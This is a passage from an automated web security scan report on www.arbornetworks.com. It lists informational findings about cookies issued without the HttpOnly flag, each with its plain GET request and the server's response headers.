Date: Wed, 02 Feb 2011 23:46:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=99f449be477395a8a82b952375751e51; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:46:29 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:46:29 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:46:30 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:46:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...

11.338. http://www.arbornetworks.com/en/network-security-experts-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-security-experts-2.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/network-security-experts-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:35 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=e0ad0b3b438eff7eb9a9b7ce51f39b55; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:37 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:37 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:38 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:38 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...

11.339. http://www.arbornetworks.com/en/network-security-monitoring-solutions-for-your-industry.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-security-monitoring-solutions-for-your-industry.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/network-security-monitoring-solutions-for-your-industry.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:47:13 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=505235edf483a158ecebac85777f0743; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:47:15 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:47:15 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:47:16 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:47:16 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...

11.340. http://www.arbornetworks.com/en/network-security-research-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-security-research-2.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/network-security-research-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:50:00 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=edd9b1042e0935dcfca0d82e7925fe75; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:50:02 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:50:02 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:50:03 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:50:03 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: PartnerSale
...[SNIP]...

11.341. http://www.arbornetworks.com/en/network-security-visibility-products-235.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-security-visibility-products-235.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/network-security-visibility-products-235.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:46:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=9ca357c77fb8d9ec464ea50ba73afe23; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:46:30 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:46:30 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:46:31 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:46:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...

11.342. http://www.arbornetworks.com/en/network-solutions-we-provide.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/network-solutions-we-provide.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/network-solutions-we-provide.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:46:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=ecde10bc1d085d0b4369565963e727bd; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:46:37 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:46:37 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:46:38 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:46:39 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsidePages
...[SNIP]...

11.343. http://www.arbornetworks.com/en/news-events.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/news-events.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/news-events.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:54:03 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=0186987ea9708d674c7b7b679faa5873; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:54:03 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:54:03 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:54:04 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:54:05 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...

11.344. http://www.arbornetworks.com/en/partnership-inquiry-form.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/partnership-inquiry-form.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/partnership-inquiry-form.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:52:00 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=6c13678309361756ea6d2a07221682c2; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:52:02 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:52:02 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:52:03 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Wed, 02 Feb 2011 23:52:04 GMT
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...

11.345. http://www.arbornetworks.com/en/services-network-support-maintenance-training-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/services-network-support-maintenance-training-2.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/services-network-support-maintenance-training-2.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:46:37 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=54f17b46b1fe1a9e43cd4c9a98aa1b2d; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:46:37 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:46:37 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:46:38 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:46:38 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...

11.346. http://www.arbornetworks.com/en/solution-partners-4.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/solution-partners-4.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/solution-partners-4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:51:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=6d1a18c8fda8feedf2f017203bd9dd3a; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:51:19 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:51:19 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:51:20 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:51:20 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...

11.347. http://www.arbornetworks.com/en/solutions-for-places-in-your-network.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/solutions-for-places-in-your-network.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/solutions-for-places-in-your-network.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:47:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=1a559561f6bd471812a19e09b9f7e1b4; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:47:18 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:47:18 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:47:19 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:47:20 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...

11.348. http://www.arbornetworks.com/en/solutions-for-your-business-needs.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/solutions-for-your-business-needs.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/solutions-for-your-business-needs.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:47:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=2b5b85b15cf3556f87196df2b8459c1c; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:47:12 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:47:12 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:47:13 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:47:13 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: LandingPage
...[SNIP]...

11.349. http://www.arbornetworks.com/en/technology-partners-4.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/technology-partners-4.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/technology-partners-4.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:51:41 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=1d8fd8cec5c231279acf78bcd7bc879a; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:51:43 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:51:43 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:51:44 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:51:44 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: InsideP
...[SNIP]...

11.350. http://www.arbornetworks.com/en/what-we-do-network-security-solutions-services.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /en/what-we-do-network-security-solutions-services.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /en/what-we-do-network-security-solutions-services.html HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:46:29 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=ab7c6f014769b232b025d6743b146e21; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:46:30 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:46:30 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:46:31 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:46:31 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


